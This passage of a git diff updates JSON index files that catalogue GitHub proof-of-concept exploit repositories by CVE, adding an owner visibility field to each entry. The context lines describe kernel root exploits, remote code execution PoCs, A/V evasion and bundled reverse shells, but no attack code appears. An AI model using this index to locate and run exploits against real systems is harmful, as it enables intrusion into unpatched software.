"https:\/\/github.com\/benjholla\/CVE-2012-4681-Armoring", "description": "An A\/V evasion armoring experiment for CVE-2012-4681", @@ -37,7 +38,8 @@ "login": "ZH3FENG", "id": 20502660, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20502660?v=4", - "html_url": "https:\/\/github.com\/ZH3FENG" + "html_url": "https:\/\/github.com\/ZH3FENG", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ZH3FENG\/PoCs-CVE_2012_4681", "description": "A Simple PoC for CVE-2012-4681", diff --git a/2012/CVE-2012-4792.json b/2012/CVE-2012-4792.json index 5eafc0036d..f756a7d1cf 100644 --- a/2012/CVE-2012-4792.json +++ b/2012/CVE-2012-4792.json @@ -7,7 +7,8 @@ "login": "WizardVan", "id": 7245104, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7245104?v=4", - "html_url": "https:\/\/github.com\/WizardVan" + "html_url": "https:\/\/github.com\/WizardVan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WizardVan\/CVE-2012-4792", "description": "CVE-2012-4792 simple calc exploitation", diff --git a/2012/CVE-2012-4869.json b/2012/CVE-2012-4869.json index 540e171877..5d34ad17ff 100644 --- a/2012/CVE-2012-4869.json +++ b/2012/CVE-2012-4869.json @@ -7,7 +7,8 @@ "login": "bitc0de", "id": 3879848, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3879848?v=4", - "html_url": "https:\/\/github.com\/bitc0de" + "html_url": "https:\/\/github.com\/bitc0de", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bitc0de\/Elastix-Remote-Code-Execution", "description": "Exploit for Elastix 2.2.0 and FreePBX 2.10.0 based on CVE-2012-4869 vulnerability working on Python3", @@ -37,7 +38,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2012-4869", "description": null, diff --git a/2012/CVE-2012-4929.json b/2012/CVE-2012-4929.json index d3cafe4bad..85c7f96454 100644 --- a/2012/CVE-2012-4929.json +++ b/2012/CVE-2012-4929.json @@ -7,7 +7,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/CRIME-poc", "description": ":hocho: CRIME attack PoC : a compression oracle attacks CVE-2012-4929 :hocho:", @@ -41,7 +42,8 @@ "login": "anthophilee", "id": 75995332, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4", - "html_url": "https:\/\/github.com\/anthophilee" + "html_url": "https:\/\/github.com\/anthophilee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan", "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device", diff --git a/2012/CVE-2012-5106.json b/2012/CVE-2012-5106.json index 22102a5f9c..d3a773c869 100644 --- a/2012/CVE-2012-5106.json +++ b/2012/CVE-2012-5106.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2012-5106", "description": "CVE-2012-5106 - Freefloat FTP Server Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", diff --git a/2012/CVE-2012-5321.json b/2012/CVE-2012-5321.json index 8a6f340582..84c67431b5 100644 --- a/2012/CVE-2012-5321.json +++ b/2012/CVE-2012-5321.json @@ -7,7 +7,8 @@ "login": "Cappricio-Securities", "id": 102907425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", - "html_url": "https:\/\/github.com\/Cappricio-Securities" + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2012-5321", "description": "TikiWiki CMS Groupware v8.3 - Open Redirect", diff --git a/2012/CVE-2012-5519.json b/2012/CVE-2012-5519.json index 4f71ae82f3..798a7dd470 100644 --- a/2012/CVE-2012-5519.json +++ b/2012/CVE-2012-5519.json @@ -7,7 +7,8 @@ "login": "p1ckzi", "id": 44880203, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", - "html_url": "https:\/\/github.com\/p1ckzi" + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2012-5519", "description": "cups-root-file-read.sh | CVE-2012-5519", diff --git a/2012/CVE-2012-5575.json b/2012/CVE-2012-5575.json index b607744e4d..b5812a31b0 100644 --- a/2012/CVE-2012-5575.json +++ b/2012/CVE-2012-5575.json @@ -7,7 +7,8 @@ "login": "tafamace", "id": 45160113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", - "html_url": "https:\/\/github.com\/tafamace" + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tafamace\/CVE-2012-5575", "description": null, diff --git a/2012/CVE-2012-5613.json b/2012/CVE-2012-5613.json index 0a692f5994..3814beb425 100644 --- a/2012/CVE-2012-5613.json +++ b/2012/CVE-2012-5613.json @@ -7,7 +7,8 @@ "login": "Hood3dRob1n", "id": 1881344, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1881344?v=4", - "html_url": "https:\/\/github.com\/Hood3dRob1n" + "html_url": "https:\/\/github.com\/Hood3dRob1n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Hood3dRob1n\/MySQL-Fu.rb", "description": "MySQL-Fu is a Ruby based MySQL Client Script I wrote. It does most of the stuff a normal MySQL client might do: SQL Shell, Update\/Delete\/Drop Database\/Table, Add\/Delete Users, Dump Database(s)\/Table w\/ option for gzip...... Plus a few extra options to make life a little easier for pentests. Includes Several builtin PHP Command Shell options as well as Pentestmonkey's PHP Reverse Shell, in addition to multiple options for file writing and reading (all files read logged locally for offline analysis later), also includes Ruby port of Kingcope's CVE-2012-5613 Linux MySQL Privilege Escalation Exploit.", @@ -37,7 +38,8 @@ "login": "w4fz5uck5", "id": 32375656, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32375656?v=4", - "html_url": "https:\/\/github.com\/w4fz5uck5" + "html_url": "https:\/\/github.com\/w4fz5uck5", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/w4fz5uck5\/UDFPwn-CVE-2012-5613", "description": "MySQL 4.x\/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) automation script.", diff --git a/2012/CVE-2012-5664.json b/2012/CVE-2012-5664.json index fac45b54dc..5c2bd7f8de 100644 --- a/2012/CVE-2012-5664.json +++ b/2012/CVE-2012-5664.json @@ -7,7 +7,8 @@ "login": "phusion", "id": 830588, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/830588?v=4", - "html_url": "https:\/\/github.com\/phusion" + "html_url": "https:\/\/github.com\/phusion", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/phusion\/rails-cve-2012-5664-test", "description": "Demo app showing how the Rails CVE-2013-5664 vulnerability works.", diff --git a/2012/CVE-2012-5958.json b/2012/CVE-2012-5958.json index 25c883c27e..6a50c81926 100644 --- a/2012/CVE-2012-5958.json +++ b/2012/CVE-2012-5958.json @@ -7,7 +7,8 @@ "login": "lochiiconnectivity", "id": 4155305, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4155305?v=4", - "html_url": "https:\/\/github.com\/lochiiconnectivity" + "html_url": "https:\/\/github.com\/lochiiconnectivity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lochiiconnectivity\/vulnupnp", "description": "Discover uPNP devices vulnerable to CVE-2013-0229 \/ CVE-2013-0230 \/ CVE-2012-5958 \/ CVE-2012-5959", diff --git a/2012/CVE-2012-5960.json b/2012/CVE-2012-5960.json index b962aaff58..551e5222b9 100644 --- a/2012/CVE-2012-5960.json +++ b/2012/CVE-2012-5960.json @@ -7,7 +7,8 @@ "login": "finn79426", "id": 26408530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26408530?v=4", - "html_url": "https:\/\/github.com\/finn79426" + "html_url": "https:\/\/github.com\/finn79426", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/finn79426\/CVE-2012-5960-PoC", "description": "CVE-2012-5960, CVE-2012-5959 Proof of Concept", diff --git a/2012/CVE-2012-6066.json b/2012/CVE-2012-6066.json index 8bd1c93515..4916f44fd1 100644 --- a/2012/CVE-2012-6066.json +++ b/2012/CVE-2012-6066.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/CVE-2012-6066", "description": "FreeSSHD Remote Authentication Bypass Vulnerability (freeSSHd 2.1.3)", diff --git a/2012/CVE-2012-6636.json b/2012/CVE-2012-6636.json index c6be1805d1..d7dc6ee5a3 100644 --- a/2012/CVE-2012-6636.json +++ b/2012/CVE-2012-6636.json @@ -7,7 +7,8 @@ "login": "xckevin", "id": 5159879, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5159879?v=4", - "html_url": "https:\/\/github.com\/xckevin" + "html_url": "https:\/\/github.com\/xckevin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xckevin\/AndroidWebviewInjectDemo", "description": "An app demo for test android webview security issue: CVE-2012-6636", @@ -41,7 +42,8 @@ "login": "Snip3R69", "id": 76834257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76834257?v=4", - "html_url": "https:\/\/github.com\/Snip3R69" + "html_url": "https:\/\/github.com\/Snip3R69", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Snip3R69\/CVE-2013-4710-WebView-RCE-Vulnerability", "description": "Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.", diff --git a/2013/CVE-2013-0156.json b/2013/CVE-2013-0156.json index e369aa1e4a..bffbe23d2f 100644 --- a/2013/CVE-2013-0156.json +++ b/2013/CVE-2013-0156.json @@ -7,7 +7,8 @@ "login": "terracatta", "id": 315873, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/315873?v=4", - "html_url": "https:\/\/github.com\/terracatta" + "html_url": "https:\/\/github.com\/terracatta", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/terracatta\/name_reverser", "description": "Silly Rails App to demonstrate vuln CVE-2013-0156", @@ -37,7 +38,8 @@ "login": "heroku", "id": 23211, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23211?v=4", - "html_url": "https:\/\/github.com\/heroku" + "html_url": "https:\/\/github.com\/heroku", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heroku\/heroku-CVE-2013-0156", "description": "Inspect all of your heroku apps to see if they are running a vulnerable version of Rails", @@ -67,7 +69,8 @@ "login": "josal", "id": 88265, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88265?v=4", - "html_url": "https:\/\/github.com\/josal" + "html_url": "https:\/\/github.com\/josal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/josal\/crack-0.1.8-fixed", "description": "crack repo from jnunemaker but with version 0.1.8 and rails CVE-2013-0156 vulnerability fixed", @@ -97,7 +100,8 @@ "login": "bsodmike", "id": 368260, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/368260?v=4", - "html_url": "https:\/\/github.com\/bsodmike" + "html_url": "https:\/\/github.com\/bsodmike", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bsodmike\/rails-exploit-cve-2013-0156", "description": "Bootstrapped Rails 3.2.10 to test the remote code exploit CVE-2013-0156", @@ -127,7 +131,8 @@ "login": "R3dKn33-zz", "id": 31809058, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31809058?v=4", - "html_url": "https:\/\/github.com\/R3dKn33-zz" + "html_url": "https:\/\/github.com\/R3dKn33-zz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/R3dKn33-zz\/CVE-2013-0156", "description": "Arbitrary deserialization that can be used to trigger SQL injection and even Code execution", @@ -157,7 +162,8 @@ "login": "Jjdt12", "id": 140899832, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140899832?v=4", - "html_url": "https:\/\/github.com\/Jjdt12" + "html_url": "https:\/\/github.com\/Jjdt12", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Jjdt12\/kuang_grade_mk11", "description": "Pseudo shell for CVE-2013-0156. ", diff --git a/2013/CVE-2013-0212.json b/2013/CVE-2013-0212.json index c27d97c411..ac04d816c3 100644 --- a/2013/CVE-2013-0212.json +++ b/2013/CVE-2013-0212.json @@ -7,7 +7,8 @@ "login": "LogSec", "id": 81561547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81561547?v=4", - "html_url": "https:\/\/github.com\/LogSec" + "html_url": "https:\/\/github.com\/LogSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LogSec\/CVE-2013-0212", "description": null, diff --git a/2013/CVE-2013-0229.json b/2013/CVE-2013-0229.json index 25c883c27e..6a50c81926 100644 --- a/2013/CVE-2013-0229.json +++ b/2013/CVE-2013-0229.json @@ -7,7 +7,8 @@ "login": "lochiiconnectivity", "id": 4155305, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4155305?v=4", - "html_url": "https:\/\/github.com\/lochiiconnectivity" + "html_url": "https:\/\/github.com\/lochiiconnectivity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lochiiconnectivity\/vulnupnp", "description": "Discover uPNP devices vulnerable to CVE-2013-0229 \/ CVE-2013-0230 \/ CVE-2012-5958 \/ CVE-2012-5959", diff --git a/2013/CVE-2013-0269.json b/2013/CVE-2013-0269.json index 093e0e7ba3..0c32c2f45b 100644 --- a/2013/CVE-2013-0269.json +++ b/2013/CVE-2013-0269.json @@ -7,7 +7,8 @@ "login": "heroku", "id": 23211, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23211?v=4", - "html_url": "https:\/\/github.com\/heroku" + "html_url": "https:\/\/github.com\/heroku", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heroku\/heroku-CVE-2013-0269", "description": "Inspect all of your Heroku apps for vulnerable versions of the JSON gem", @@ -37,7 +38,8 @@ "login": "danring", "id": 52101, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52101?v=4", - "html_url": "https:\/\/github.com\/danring" + "html_url": "https:\/\/github.com\/danring", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/danring\/heroku-CVE-2013-0269", "description": "Inspect all of your Heroku apps for vulnerable versions of the JSON gem", diff --git a/2013/CVE-2013-0303.json b/2013/CVE-2013-0303.json index e09d51e2b9..0411722a73 100644 --- a/2013/CVE-2013-0303.json +++ b/2013/CVE-2013-0303.json @@ -7,7 +7,8 @@ "login": "CiscoCXSecurity", "id": 66816759, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66816759?v=4", - "html_url": "https:\/\/github.com\/CiscoCXSecurity" + "html_url": "https:\/\/github.com\/CiscoCXSecurity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/CiscoCXSecurity\/ownCloud_RCE_CVE-2013-0303", "description": "ownCloud PoC for CVE-2013-0303", diff --git a/2013/CVE-2013-0333.json b/2013/CVE-2013-0333.json index 4498482154..08dd186ed3 100644 --- a/2013/CVE-2013-0333.json +++ b/2013/CVE-2013-0333.json @@ -7,7 +7,8 @@ "login": "heroku", "id": 23211, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23211?v=4", - "html_url": "https:\/\/github.com\/heroku" + "html_url": "https:\/\/github.com\/heroku", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heroku\/heroku-CVE-2013-0333", "description": null, diff --git a/2013/CVE-2013-1081.json b/2013/CVE-2013-1081.json index f642414c6c..282e18031a 100644 --- a/2013/CVE-2013-1081.json +++ b/2013/CVE-2013-1081.json @@ -7,7 +7,8 @@ "login": "steponequit", "id": 1279201, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1279201?v=4", - "html_url": "https:\/\/github.com\/steponequit" + "html_url": "https:\/\/github.com\/steponequit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/steponequit\/CVE-2013-1081", "description": "Novell ZENworks Mobile Management - LFI RCE", diff --git a/2013/CVE-2013-1300.json b/2013/CVE-2013-1300.json index d2ae04d839..6a20122133 100644 --- a/2013/CVE-2013-1300.json +++ b/2013/CVE-2013-1300.json @@ -7,7 +7,8 @@ "login": "Meatballs1", "id": 1854557, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1854557?v=4", - "html_url": "https:\/\/github.com\/Meatballs1" + "html_url": "https:\/\/github.com\/Meatballs1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Meatballs1\/cve-2013-1300", "description": null, diff --git a/2013/CVE-2013-1488.json b/2013/CVE-2013-1488.json index 59f4468047..100d3db1f6 100644 --- a/2013/CVE-2013-1488.json +++ b/2013/CVE-2013-1488.json @@ -7,7 +7,8 @@ "login": "v-p-b", "id": 540246, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/540246?v=4", - "html_url": "https:\/\/github.com\/v-p-b" + "html_url": "https:\/\/github.com\/v-p-b", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/v-p-b\/buherablog-cve-2013-1488", "description": "PoC Java exploit based on http:\/\/www.contextis.com\/research\/blog\/java-pwn2own\/", diff --git a/2013/CVE-2013-1491.json b/2013/CVE-2013-1491.json index d7b5435f9b..5c6cca3ff4 100644 --- a/2013/CVE-2013-1491.json +++ b/2013/CVE-2013-1491.json @@ -7,7 +7,8 @@ "login": "guhe120", "id": 5601255, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5601255?v=4", - "html_url": "https:\/\/github.com\/guhe120" + "html_url": "https:\/\/github.com\/guhe120", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/guhe120\/CVE20131491-JIT", "description": "JIT spray version of cve-2013-1491", diff --git a/2013/CVE-2013-1690.json b/2013/CVE-2013-1690.json index 0833ba9dd2..c4aae62324 100644 --- a/2013/CVE-2013-1690.json +++ b/2013/CVE-2013-1690.json @@ -7,7 +7,8 @@ "login": "vlad902", "id": 1088893, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1088893?v=4", - "html_url": "https:\/\/github.com\/vlad902" + "html_url": "https:\/\/github.com\/vlad902", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vlad902\/annotated-fbi-tbb-exploit", "description": "Annotated FBI exploit for the Tor Browser Bundle from mid-2013 (CVE-2013-1690)", diff --git a/2013/CVE-2013-1763.json b/2013/CVE-2013-1763.json index ba6ef28a6c..f718ae1f3c 100644 --- a/2013/CVE-2013-1763.json +++ b/2013/CVE-2013-1763.json @@ -7,7 +7,8 @@ "login": "qkrtjsrbs315", "id": 47624693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47624693?v=4", - "html_url": "https:\/\/github.com\/qkrtjsrbs315" + "html_url": "https:\/\/github.com\/qkrtjsrbs315", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/qkrtjsrbs315\/CVE-2013-1763", "description": null, diff --git a/2013/CVE-2013-1775.json b/2013/CVE-2013-1775.json index 900e6fd7d8..d705678fca 100644 --- a/2013/CVE-2013-1775.json +++ b/2013/CVE-2013-1775.json @@ -7,7 +7,8 @@ "login": "bekhzod0725", "id": 17560738, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17560738?v=4", - "html_url": "https:\/\/github.com\/bekhzod0725" + "html_url": "https:\/\/github.com\/bekhzod0725", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bekhzod0725\/perl-CVE-2013-1775", "description": "CVE-2013-1775 Exploit written in Perl", diff --git a/2013/CVE-2013-1965.json b/2013/CVE-2013-1965.json index 4fdbe2a1eb..ec122d85d7 100644 --- a/2013/CVE-2013-1965.json +++ b/2013/CVE-2013-1965.json @@ -7,7 +7,8 @@ "login": "cinno", "id": 11706497, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11706497?v=4", - "html_url": "https:\/\/github.com\/cinno" + "html_url": "https:\/\/github.com\/cinno", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cinno\/CVE-2013-1965", "description": "A proof of concept exploit for the CVE-2013-1965 vulnerability affecting Apache Struts 2", diff --git a/2013/CVE-2013-2006.json b/2013/CVE-2013-2006.json index 279dca6a7c..46a81f1144 100644 --- a/2013/CVE-2013-2006.json +++ b/2013/CVE-2013-2006.json @@ -7,7 +7,8 @@ "login": "LogSec", "id": 81561547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81561547?v=4", - "html_url": "https:\/\/github.com\/LogSec" + "html_url": "https:\/\/github.com\/LogSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LogSec\/CVE-2013-2006", "description": null, diff --git a/2013/CVE-2013-2028.json b/2013/CVE-2013-2028.json index 0771d67018..6ae70500b8 100644 --- a/2013/CVE-2013-2028.json +++ b/2013/CVE-2013-2028.json @@ -7,7 +7,8 @@ "login": "danghvu", "id": 1152714, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1152714?v=4", - "html_url": "https:\/\/github.com\/danghvu" + "html_url": "https:\/\/github.com\/danghvu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/danghvu\/nginx-1.4.0", "description": "For the analysis of CVE-2013-2028", @@ -37,7 +38,8 @@ "login": "kitctf", "id": 8018062, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8018062?v=4", - "html_url": "https:\/\/github.com\/kitctf" + "html_url": "https:\/\/github.com\/kitctf", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kitctf\/nginxpwn", "description": "Exploitation Training -- CVE-2013-2028: Nginx Stack Based Buffer Overflow", @@ -67,7 +69,8 @@ "login": "tachibana51", "id": 29031994, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29031994?v=4", - "html_url": "https:\/\/github.com\/tachibana51" + "html_url": "https:\/\/github.com\/tachibana51", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tachibana51\/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC", "description": "this is not stable", @@ -97,7 +100,8 @@ "login": "m4drat", "id": 39669467, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39669467?v=4", - "html_url": "https:\/\/github.com\/m4drat" + "html_url": "https:\/\/github.com\/m4drat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/m4drat\/CVE-2013-2028-Exploit", "description": "CVE-2013-2028 python exploit", @@ -132,7 +136,8 @@ "login": "jptr218", "id": 84092766, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4", - "html_url": "https:\/\/github.com\/jptr218" + "html_url": "https:\/\/github.com\/jptr218", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jptr218\/nginxhack", "description": "A CVE-2013-2028 implementation", @@ -162,7 +167,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2013-2028-reproduction", "description": "CVE-2013-2028复现", @@ -192,7 +198,8 @@ "login": "xiw1ll", "id": 69167284, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69167284?v=4", - "html_url": "https:\/\/github.com\/xiw1ll" + "html_url": "https:\/\/github.com\/xiw1ll", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xiw1ll\/CVE-2013-2028_Checker", "description": "Tool for checking Nginx CVE-2013-2028", diff --git a/2013/CVE-2013-2072.json b/2013/CVE-2013-2072.json index 0718116747..a37e0b69eb 100644 --- a/2013/CVE-2013-2072.json +++ b/2013/CVE-2013-2072.json @@ -7,7 +7,8 @@ "login": "bl4ck5un", "id": 2434648, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2434648?v=4", - "html_url": "https:\/\/github.com\/bl4ck5un" + "html_url": "https:\/\/github.com\/bl4ck5un", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-2072", "description": "Buffer overflow in the Python bindings for the xc_vcpu_setaffinity call in Xen", diff --git a/2013/CVE-2013-2094.json b/2013/CVE-2013-2094.json index 6c04e4a73b..e03ecd5823 100644 --- a/2013/CVE-2013-2094.json +++ b/2013/CVE-2013-2094.json @@ -7,7 +7,8 @@ "login": "realtalk", "id": 4284520, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4284520?v=4", - "html_url": "https:\/\/github.com\/realtalk" + "html_url": "https:\/\/github.com\/realtalk", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/realtalk\/cve-2013-2094", "description": "original cve-2013-2094 exploit and a rewritten version for educational purposes", @@ -37,7 +38,8 @@ "login": "hiikezoe", "id": 188175, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188175?v=4", - "html_url": "https:\/\/github.com\/hiikezoe" + "html_url": "https:\/\/github.com\/hiikezoe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hiikezoe\/libperf_event_exploit", "description": "CVE-2013-2094 exploit for android", @@ -67,7 +69,8 @@ "login": "Pashkela", "id": 4710642, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4710642?v=4", - "html_url": "https:\/\/github.com\/Pashkela" + "html_url": "https:\/\/github.com\/Pashkela", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pashkela\/CVE-2013-2094", "description": "CVE-2013-2094 Linux 2.6.32\/2.6.37 - 3.8.10 PERF_EVENTS local root x86\/x86_64", @@ -97,7 +100,8 @@ "login": "tarunyadav", "id": 1026941, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1026941?v=4", - "html_url": "https:\/\/github.com\/tarunyadav" + "html_url": "https:\/\/github.com\/tarunyadav", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tarunyadav\/fix-cve-2013-2094", "description": null, @@ -127,7 +131,8 @@ "login": "timhsutw", "id": 3866079, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3866079?v=4", - "html_url": "https:\/\/github.com\/timhsutw" + "html_url": "https:\/\/github.com\/timhsutw", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timhsutw\/cve-2013-2094", "description": "CVE-2013-2094 kernel exploit for i386", @@ -157,7 +162,8 @@ "login": "vnik5287", "id": 9650718, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9650718?v=4", - "html_url": "https:\/\/github.com\/vnik5287" + "html_url": "https:\/\/github.com\/vnik5287", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vnik5287\/CVE-2013-2094", "description": "perf_swevent_init", diff --git a/2013/CVE-2013-2165.json b/2013/CVE-2013-2165.json index be41319c68..2add0676d5 100644 --- a/2013/CVE-2013-2165.json +++ b/2013/CVE-2013-2165.json @@ -7,7 +7,8 @@ "login": "Pastea", "id": 24623933, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24623933?v=4", - "html_url": "https:\/\/github.com\/Pastea" + "html_url": "https:\/\/github.com\/Pastea", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pastea\/CVE-2013-2165", "description": null, diff --git a/2013/CVE-2013-2171.json b/2013/CVE-2013-2171.json index 02978574a7..e8ee1ed4a9 100644 --- a/2013/CVE-2013-2171.json +++ b/2013/CVE-2013-2171.json @@ -7,7 +7,8 @@ "login": "0xGabe", "id": 68028935, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4", - "html_url": "https:\/\/github.com\/0xGabe" + "html_url": "https:\/\/github.com\/0xGabe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xGabe\/FreeBSD-9.0-9.1-Privilege-Escalation", "description": "CVE-2013-2171", diff --git a/2013/CVE-2013-2186.json b/2013/CVE-2013-2186.json index 24a91a2266..6a19d62bde 100644 --- a/2013/CVE-2013-2186.json +++ b/2013/CVE-2013-2186.json @@ -7,7 +7,8 @@ "login": "GrrrDog", "id": 3898942, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3898942?v=4", - "html_url": "https:\/\/github.com\/GrrrDog" + 